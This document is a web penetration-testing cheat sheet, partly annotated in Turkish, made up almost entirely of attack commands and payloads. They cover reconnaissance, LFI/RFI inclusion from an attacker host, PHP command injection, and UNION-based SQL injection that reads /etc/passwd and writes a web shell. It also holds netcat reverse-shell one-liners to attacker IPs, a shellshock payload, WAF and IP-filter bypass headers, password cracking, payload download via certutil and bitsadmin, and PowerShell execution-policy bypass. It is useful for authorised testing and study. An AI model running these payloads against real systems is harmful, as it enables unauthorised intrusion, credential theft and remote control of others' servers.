HTTP Enumeration
----------------------------------------------
# Enum
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
wfuzz -c -z file,users.txt -z file,pass.txt --sc 200 http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z
dirb <targetip>
dirbuster : İnteresting file scan
dmitry <targetadress>
theharvester -d microsoft.com -l 500 -b google -h myresults
sublist3r -d google.com
whatweb 
whois <adress>
-------------------------------------------
# Online Enum
http://dnshistory.org/
https://subdomainfinder.c99.nl/
https://www.qualys.com/
https://jwt.io/
https://sitereport.netcraft.com/
https://www.pic2map.com
https://dnsdumpster.com/
https://haveibeenpwned.com/
https://www.kitterman.com/spf/validate.html
https://crt.sh/
https://www.shodan.io/
https://www.garykessler.net/library/file_sigs.html
https://public-dns.info/ -recursive dns tespiti için
--------------------------------------------
# Dns zone Enum
fierce -dns <adress>
dnsrecon <adress> 
----------------------------------------------
# nikto
nıkto -h <targetip>
skipsfish -o <kaydetmeadı> <websitesi>
----------------------------------------------
# curl
curl -v -X OPTIONS http://<targetip>/test/
curl --upload-file <file name> -v --url <url> -0 --http1.0
--------------------------------------------
# WEBDAV
davtest <ipadres>
# file upload basic 
curl -T 'm.txt' 'http://192.168.1.48/dav/hac.txt'
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
----------------------------------------------

# RFI
?page=http://attackerserver.com/evil.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php://input?cmd=ls


----------------------------------------------
# Command Execution
<?php system('ls -la');?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
 mkdir m$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 8000 >/tmp/f)
---------------------------------------------

# LFI and RCE

# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>

# Go to LFI vuln and
?=…….&cmd=ls

---------------------------------------------
#code injection

codeinjection :
";system("ls");$var="
${@system(ls)} //filter bypass

----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'

# find the number of columns
photoalbum.php?id=1 order by 8

# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8

# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8

# Get version
?id=1 union select 1,2,3,4,version(),6,7,8

# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables

# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users

# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -	

# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -	
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -	
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -	
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -

----------------------------------------------

# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png

----------------------------------------------
#Windows Command Execution (RFI exploit)

#Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send 
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv 10.11.25.59 4444

---------------------------------------------
#shellshock:
() { :; }; /bin/bash -c 'ping 3 192.168.1.52;nc 192.168.1.52 1234 -e /bin/sh'

--------------------------------------------
#Dirbuster
bak, backup, txt, copy, save, old, rar, zip, tar.gz, pdf
wordlist = /usr/share/dirbuster/directory-list-2.3-medium.txt
-------------------------------------------
#hpp waf bypass 

url&s1=muslum&s2=muslum
url&s1="><img src=ab onerror=al&s2=ert(1)> 

------------------------------------------
#ip bypass 
X-Forwarded-For : istenen ip adresi
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
-----------------------------------------
#Crack

*Cewl
cewl http://<targetip>/ -m 6 -w cewl.txt

*hashcat -h | grep -i lm 
hashcat -m 3000  hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt

*John
john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt 

*Cupp
python3 cupp.py -i

*MP64
mp64 m?s?l?u?m

*ZipCrack
zip2john encrypted.zip > encrypted.hash$ : hashi çıkar
john --show encrypted.hash : hashi kır.

*hydra
hydra -l user -P passlist.txt ftp://192.168.0.1

*Medusa
medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10

--------------------------------------
#FileTransfer Linux

Python SimpleHTTPServer
*on Attacker
python -m SimpleHTTPServer

*on target
wget <attackerip>:8000/filename

*with php
php -S <ip>:<port>
php -S 192.168.1.1:80 

*on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file 
-------------------------------------
#FileTransfer Windows
certutil.exe --urlcache -split -f "<url>"
bitsadmin.exe /transfer n "<url>" "dosyanın koyulacağı yer"
Invoke-WebRequest https://path/to/file.txt -OutFile C:\file.txt

------------------------------------
# Windows Bypass powershell
powershell.exe -exec bypass 
powsershell.exe -ep bypass -nop

------------------------------------
Interactive TTY Shell
*python
python -c 'import pty; pty.spawn("/bin/sh")'
*Echo
echo 'os.system('/bin/bash')'
*sh
/bin/sh -i
# bash
/bin/bash -i
*kısıtlı shell 
echo && "bash"
--------------------------------------------
#C-Compile - windows - Linux
// Target 64-bit native Windows
$ x86_64-w64-mingw32-gcc
// Target 32-bit native Windows
$ i686-w64-mingw32-gcc
// Linux
$ gcc -pthread c0w.c  -o c0w


